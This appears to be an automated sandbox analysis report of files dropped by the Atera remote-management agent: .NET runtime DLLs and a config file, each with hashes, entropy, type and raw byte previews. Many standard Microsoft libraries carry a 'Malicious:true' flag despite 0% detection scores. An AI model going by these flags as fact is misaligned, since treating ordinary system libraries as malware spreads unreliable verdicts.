                                                                                                                                                                                                                                        SHA-512:CD041171004B2D4CDB5C9F403EA7A1ECEE251386C8D558A8DE9D8D3DCFC5A0E91F4756DE3BEE113E50DC3D72434A8BF0E2427A92EB3E7E54DF60A7934C5BD375
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z............"...0..............;... ...@....@.. .......................`............`..................................;..O....@..@...............((...@.......:..8............................................ ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......@......................@..B.................;......H.......H$...............................................................0..;.......~....s.....(.....(.~....r...p.o....r...p.o....(....o......*............(......(....*.s.........*.0..x........(......}.....(.....s....}.....s....}....(...+.~....%-.&~..........s....%............s....(.....{....s.......s....}....*.0..5.......(....--(....o......(.......(....+. ....( ....{....,.*....0..I.........i....*..{.......o!.....{.....o...+.. ..{....r!..p.o....(#...o.......*.*............'..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19433
                                                                                                                                                                                                                                        Entropy (8bit):4.9963400212242055
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:hrg4CdkumUwfGReGWeGFuGgeKCUDuTeHOTu0U5e3eTOaUmS0SXStuKhubUfSJeZY:hrPOPUDCTHffIz
                                                                                                                                                                                                                                        MD5:78AE9CC6C7B11BAC2B18E82FC7623CDB
                                                                                                                                                                                                                                        SHA1:8314E6F35448B820C7C703FC3E4DE598D2A51AEC
                                                                                                                                                                                                                                        SHA-256:D3841AA3440CDA26776DDE128157294E69A70B21344D5877D640C457353C2DCB
                                                                                                                                                                                                                                        SHA-512:CE6A750E75090487C47095B80D47F5AD0C3D3DE4D6EC58A01E14CC694600FEF951AE371DD2A1B82C756ADD66825611B13240DDD3AAE6339ED85DBD3392DED7E5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Numerics.Vectors" pub

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\StructureMap.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284200
                                                                                                                                                                                                                                        Entropy (8bit):6.116883944959782
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:9ZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHh:Pgo0WPVTXgB
                                                                                                                                                                                                                                        MD5:B3A083FF4CBA132ED396B4065F8DB23A
                                                                                                                                                                                                                                        SHA1:8419F4EAE5F93791B80B978442F38821840049E5
                                                                                                                                                                                                                                        SHA-256:ED7D1084B55D98E76DC0D179ABDB9E709E9F0620B7E2DD9BE0642087F2238A9D
                                                                                                                                                                                                                                        SHA-512:AA05ACCCB10FDC132C124AC97FA85FED063065E26EA019A3914C778094BD361197D9949D3ABCCAE9A106B857C22838BFC6D4DC493698A3C9BD061C38417D0500
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ..............................e.....`..................................B..O....`..D...............((...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.AppContext.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.80745185498431
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:sDNxWQFWsoNyb8E9VF6IYijSJIVx5+zULOj:sDNVLAEpYi603L6
                                                                                                                                                                                                                                        MD5:5EA678C775885C4D41D2B8085D6C1329
                                                                                                                                                                                                                                        SHA1:DDEE62213D83D36761CD4753C817B7F532C90FDB
                                                                                                                                                                                                                                        SHA-256:511AFD4967D12F4BC7C372E06805CA25F10EA8C150485A4AAC7EEF34AD96FFEE
                                                                                                                                                                                                                                        SHA-512:A9E2AD6546E116B7F5251219B1490309E2DBC4A85609DC3F4F6CD3A74A0810E7D3C139435F3ADF4852C5154B30850ACF3F968176FCEBB7F98B4953EE9C42781E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0.............f(... ...@....... ....................................@..................................(..O....@..................((...`.......&............................................... ............... ..H............text...l.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................H(......H.......P ......................\&......................................BSJB............v4.0.30319......l...|...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.....K.N...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22056
                                                                                                                                                                                                                                        Entropy (8bit):6.67025116344336
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:8rMdp9yXOfPfAxR5zwWvYW8aznNyb8E9VF6IYijSJIVxACSA0:8rMcXP64LEpYi60x0
                                                                                                                                                                                                                                        MD5:5448F30F77E8AC70F71ADE83B18472C4
                                                                                                                                                                                                                                        SHA1:5D9FAD6ED586ED5C4CB5A2A97742A318338D9643
                                                                                                                                                                                                                                        SHA-256:B686492BF626005C95E06D535F2EC57C5ECD4ABB57039148223B4C4BB58857C9
                                                                                                                                                                                                                                        SHA-512:FB99BE04C6D4A2717C9779E616064656D52EBB007F1BF590894E4A54D1DFEE483A659416CFDB9F2F4A57E93F66C0793690DEBD63181BDEB0FDF8B4DD44D39BD9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ..............................]G....@..................................B..O....`..@...............((...........A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Concurrent.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.903910775953741
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Cm2igOWnW8rW/tNyb8E9VF6IYijSJIVxPT89oZ:qtaJEpYi60w9k
                                                                                                                                                                                                                                        MD5:73960FEC696D77048AD18D7A7E17E3D2
                                                                                                                                                                                                                                        SHA1:4B48B936F15CB825801C0A0D610C72C932BC03FF
                                                                                                                                                                                                                                        SHA-256:C07895B715613D99E0C06C8B6EA878583449B63D79FC70C6EA18A433CD97CE74
                                                                                                                                                                                                                                        SHA-512:D248679A2DC44E1958007999CCBCE907EF5191534821C2E4FE65F75E2DC2794B87CA8978FF3EAE89504193A72DBE9099E2B4FD7A799216729CA12FAD3EFAF13B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ..............................2.....@.................................t)..O....@..D...............((...`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...D....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3................................................n.o.....o.....\...........8...3.8...P.8.....8.....8.....8.....8.....8.....1.....8.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.NonGeneric.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.9013060612731305
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Anapn1iwwPWcGWT5JNyb8E9VF6IYijSJIVxagmKfFx:LDur5NEpYi600Mj
                                                                                                                                                                                                                                        MD5:D9B7F97B00C1019C0A658A8FD61D23AB
                                                                                                                                                                                                                                        SHA1:7436FD8F1295B94C9D4CACC0CD749214C5EFF9F7
                                                                                                                                                                                                                                        SHA-256:B0277FDF71A7A354DB40AE7B893935B1F1125D07A669EBA161402C1840D8760A
                                                                                                                                                                                                                                        SHA-512:253F0D268C6665B2B4FC10B4B69A02C0D09AFCBDC77261903D44F0BCF8084715977A4A955B8DB1FD0C465619ADC6491D377E9A4A718DEE21FA46CDF133BC3215
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ...............................4....@.................................p)..O....@..@...............((...`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..t.......#Strings....<.......#US.@.......#GUID...P.......#Blob......................3................................................F.o.....o.....\...........,.....,...(.,.....,...f.,.....,.....,.....,.....%.....,.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Specialized.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.905254064531646
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:2HLaEav5aaUa6arWVLWrMNyb8E9VF6IYijSJIVxg3wh:fPv5t/NOOMEpYi608o
                                                                                                                                                                                                                                        MD5:86DE589411D424DEAA6D93BA307F47D9
                                                                                                                                                                                                                                        SHA1:72F0DABE9E80E99FE6790038DB65B7A0F72BED79
                                                                                                                                                                                                                                        SHA-256:E598151F3E78C3FFC0BA5545EB5940958647E8BF602E63ECF827215847FEAA93
                                                                                                                                                                                                                                        SHA-512:DAED170855C06AF14E8051F41E6A4ED75476F573FCE0D45119DCB74209E5A9092DB4BE7FBCA63CAEADBA835E79C420C6E1F942F608CC55A07DF85C6B9D823E34
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ...............................!....@..................................)..O....@..P...............((...`......P(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................`.....`...t.M.................................=.....V.................q.....Z...................G.....G.....G...).G...1.G...9.G...A.G...I.G...Q.G...Y.G...a.G...i.G...q.G.......................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.761212536405013
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:o6iIJq56dOuWSKeWukNyb8E9VF6IYijSJIVxHDRxQpgu:yiAuEEpYi609mz
                                                                                                                                                                                                                                        MD5:45B171668A91DE91B8D8A967BDED3496
                                                                                                                                                                                                                                        SHA1:DC3CD286C8F6DBFC029D51B25D956751CA389702
                                                                                                                                                                                                                                        SHA-256:D37F94141FE5571E05C030DD509EADCA179262C73858301433CD7D503CBE8E83
                                                                                                                                                                                                                                        SHA-512:21D79E9D2DC5CB67D8ECDBB07181C7089C44CF050EEBA59923CFDC2615FA0AD86B2393DD4A32E94CC8ED3C2D84A54B646AB19753B433C4E8054E182398C89388
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............*... ...@....... ...................................@..................................*..O....@..................((...`......L)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..|....................(......................................BSJB............v4.0.30319......l.......#~..|.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3................................................k.~.....~.....k...........*...0.*...M.*.....*.....*.....*.....*.....*.....#.....*.....x...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C./...K.O...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.EventBasedAsync.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.812043678321715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6nzz+MpSaLWW0+WCANyb8E9VF6IYijSJIVx1JGol:cpui4EpYi6071
                                                                                                                                                                                                                                        MD5:375A112E4A1B5F4267B87BFDA94DEC93
                                                                                                                                                                                                                                        SHA1:90CFAD6CB9D87089D904ACFCD06C2D2EFA531BD9
                                                                                                                                                                                                                                        SHA-256:7F6657438DF669688C5A9992E0F08CBC724D560FD551C72208EA45853F0F27D2
                                                                                                                                                                                                                                        SHA-512:AA66316049E361456FECEF59BE755D9B827EC3620A9B131B8E186264EFA824A878071E90DC7C0D7AFDC4E3D75E113A97777BFABBE534F26702D4668E262E38FE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............B*... ...@....... ....................................@..................................)..O....@..................((...`.......(............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$*......H.......P ......................8(......................................BSJB............v4.0.30319......l.......#~..t...@...#Strings............#US.........#GUID....... ...#Blob......................3............................................................V...........j.................i...........8.................S.....<...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.'...C.B...K.b...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.859299181620408
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:aaGhr+YUfyHxsW/HW5zNyb8E9VF6IYijSJIVxVUCn3:qkmcvEpYi60p3
                                                                                                                                                                                                                                        MD5:B5A8331889DCD73D358F868F5010A716
                                                                                                                                                                                                                                        SHA1:BBFA855EFC2C8773B25531AB9BB9FE0524E244E0
                                                                                                                                                                                                                                        SHA-256:D28856D3150D49263D128FE64C01837C75AEE8994EA8AB2B2E98B8DE6CD0608D
                                                                                                                                                                                                                                        SHA-512:B5DBE05967C4CB8971A7431C6943ADAAAA8292314316B6462D44098BA7A02E23C7E382861023E1FEF30298D956A7382CDCCA74C4A69677D7FB70111CBCF6DFCC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............+... ...@....... ....................................@.................................<+..O....@..`...............((...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................p+......H.......P ..4....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................................Y.]...{.]...6.J...}.....r........... .............................................................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.TypeConverter.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16936
                                                                                                                                                                                                                                        Entropy (8bit):6.788309691299651
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:dRE+ruiA5vzWeNWdSNyb8E9VF6IYijSJIVx4X9bS:dS9b2yEpYi60Yw
                                                                                                                                                                                                                                        MD5:42128F9EF34A6A9C41BC3714F2420AE9
                                                                                                                                                                                                                                        SHA1:2A8B7590921D91998A9848E679A87A4966A22CBB
                                                                                                                                                                                                                                        SHA-256:AC30A3D9A14A3FEC5C77D26ABEE4AB5A01F0294ED37B10EB5AFEF7BDE35F4D10
                                                                                                                                                                                                                                        SHA-512:4A563AB4FFD79539BE42D670448699353E55F6179B64C487AB4726F6DA7B60419594C8EA2DEFCC9133D398A61FD60968D2992C9449CE0CEC522F80A876342BAB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0............../... ...@....... ....................................@................................../..O....@..p...............((...`......T................................................ ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................./......H.......P .......................-......................................BSJB............v4.0.30319......l.......#~......@...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3................................;.....Y.........8...........<...........P.......................X.....q.....g................."...................I.....I.....I...).I...1.I...9.I...A.I...I.I...Q.I...Y.I...a.I...i.I...q.I.......................#.....+.....3.....;.%...C.@...K.`...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.846804915804514
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:UT+6ywnVvW0LW5SNyb8E9VF6IYijSJIVxcLhE:U998yEpYi60z
                                                                                                                                                                                                                                        MD5:3FA1361360EEAFD4AA600D782C5B95FB
                                                                                                                                                                                                                                        SHA1:807E972A8BDD373A6775BD51C6E2707700656262
                                                                                                                                                                                                                                        SHA-256:19C32753A9AD183D97039C7600F261A049FF05D33F285D114D00A7D2F254D7A3
                                                                                                                                                                                                                                        SHA-512:D0228F30D6E4E7D6C55715EB3B595FF5272C94B77A367BFEA2B20375A937690D1B473E3641107D573DD5563A0CAD91097ADBD104E8D6ED5953AB683092BF4554
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@..................((...`......|'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...h...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....7.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Console.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.848936370515642
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:QRbzriaXT+WlEWe5Nyb8E9VF6IYijSJIVxri+tlI7u2:W7icodEpYi60u872
                                                                                                                                                                                                                                        MD5:D4623C9E4AB0B90AD818A5138809851E
                                                                                                                                                                                                                                        SHA1:83F1FA87D111CC2546BC697BFC54DB102A0F1FC3
                                                                                                                                                                                                                                        SHA-256:415EC56DB96E1C881D0A625D8D5BD8443F32F746B879F3A4112477AD6F877569
                                                                                                                                                                                                                                        SHA-512:0C8FA761E6F84CC0BC334682840B6D19A7F868901B678E79FCA2F49616E1BD75BA9FEFCC6D62BA0F39CE65E91A73E2392DB121F6499E01B5E54E3FBD831FABA9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............6)... ...@....... .............................._.....@..................................(..O....@..................((...`.......'............................................... ............... ..H............text...<.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ......................,'......................................BSJB............v4.0.30319......l.......#~..H...x...#Strings............#US.........#GUID...........#Blob......................3......................................................k.....?.....$.....S.................R...........!.....j...........<.....%...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Data.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):148520
                                                                                                                                                                                                                                        Entropy (8bit):5.418030897059376
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:AdYO+3m9R6e1x03BZ6bDSzZ8B0uAP+CSR:y+2jv1x0ebezWiup
                                                                                                                                                                                                                                        MD5:C30F65C0031BF764B2DDAC10CD631AA4
                                                                                                                                                                                                                                        SHA1:3B2C305596D50E79FFBB879277AB8C821F888574
                                                                                                                                                                                                                                        SHA-256:CEF99EA049507B57C9AB0D99EEF234CD868B79AD8B36A569ED95A0DD95468938
                                                                                                                                                                                                                                        SHA-512:639AF84758EFFF76228D28B81BF3AA87E29A9A44481EB2CED28B159AD0CDCBB0C7B4D9EE8358287E29F89B5E96AE910A06221AE6DC013D7CB6C7C3C65B679FB9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
